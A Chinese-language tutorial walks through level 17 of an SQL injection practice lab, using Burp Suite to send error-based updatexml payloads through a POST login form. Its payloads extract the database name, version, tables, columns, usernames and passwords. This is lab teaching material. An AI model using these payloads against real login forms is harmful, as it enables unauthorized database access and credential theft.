文章目录
前言
本文介绍的是SQL注入闯关的第17关。笔者推荐使用的浏览器是火狐浏览器,由于第17关与之前的关卡的请求有所不同,不是GET请求,而是POST请求。同时也没有明显的回显。因此就需要Burpsuite进行爆破,在此基础上本文进行了详解。
报错注入流程
在介绍报错注入之前先介绍报错注入所要用到的两个函数。
updatexml和concat
1:updatexml函数格式updatexml(xml_target,xpath_expr,new_xml)
其中xml_target是需要操作的xml片段,new_xml是xml要更改为的值,xpath_expr是xml的路径语言。
2:concat函数的作用为将多个字符串连成一个字符串。
其他一些报错注入函数如下
floor()
extractvalue()
updatexml()
geometrycollection()
multipoint()
polygon()
multipolygon()
linestring()
multilinestring()
exp()
数据库中演示如下
select updatexml(1,concat(0x7e,(select database()),0x7e),0);
常用的一些特殊字符转16进制后的数值
0x5c:\
0x3a::
0x7e:~
SQL报错注入就是利用数据库的某些机制,人为地制造错误条件,使得查询结果能够出现在错误信息中。这种手段在联合查询受限且能返回错误信息的情况下比较好用,目前对于各种不同类型数据库,不同版本数据库报错注入时可能并不能通用,常用可以通用的报错注入的方式有两种,xpath注入和主键重复导致的报错。
闯关过程
sql第17关的界面图如下
通过这是通过用户名和密码进行登录,所以可以确定是POST请求而不是GET请求。
1:爆出数据库的名
这里先在用户名的位置输入admin,密码上输入111,然后点击submit,在之后进行抓包
这里介绍一下Burpsuite的使用方法。
在抓到包之后鼠标右键点击send to repeater。之后在页面中修改以下代码。
uname=admin&passwd=111&submit=Submit
修改为的代码如下。
uname=admin&passwd=111' or updatexml(1,concat(0x7e,(select database()),0x7e),0)#&submit=Submit
在右侧点击Render结果图如下
说明数据库的名为security。
2:爆出数据库的版本号
之后将database改为version就可以看到sql的数据库版本号。
uname=admin&passwd=111' or updatexml(1,concat(0x7e,(select version()),0x7e),0)#&submit=Submit
结果图如下。
3:爆出数据库下面的所有的表名
在以上的基础之上,修改的代码如下
uname=admin&passwd=111' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),0)#&submit=Submit
结果图如下
4:爆出表的字段名
在以上的基础上,修改的代码如下。
uname=admin&passwd=111' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='uagents'),0x7e),0)#&submit=Submit
结果图如下
5:爆出表中的用户名
在以上的基础修改的代码如下
uname=admin&passwd=111' and updatexml(1,concat(0x7e,(select group_concat(username)from (select username from users)a),0x7e),0)#&submit=Submit
结果图如下
其中a是派生表的别名。
6:爆出密码
在以上的基础修改的代码如下
uname=admin&passwd=111' and updatexml(1,concat(0x5c,(select group_concat(password) from (select password from users)a),0x7e),0)#&submit=Submit
结果图如下
这里不要以为出错了,其实正是通过这种报错表名密码是什么。
总结
由于sql注入的第17关没有明显的回显,且是POST请求。因此可以采用报错注入,通过在Burpsuite中最终爆出库的名字,表的名字,字段的名字,用户名和密码。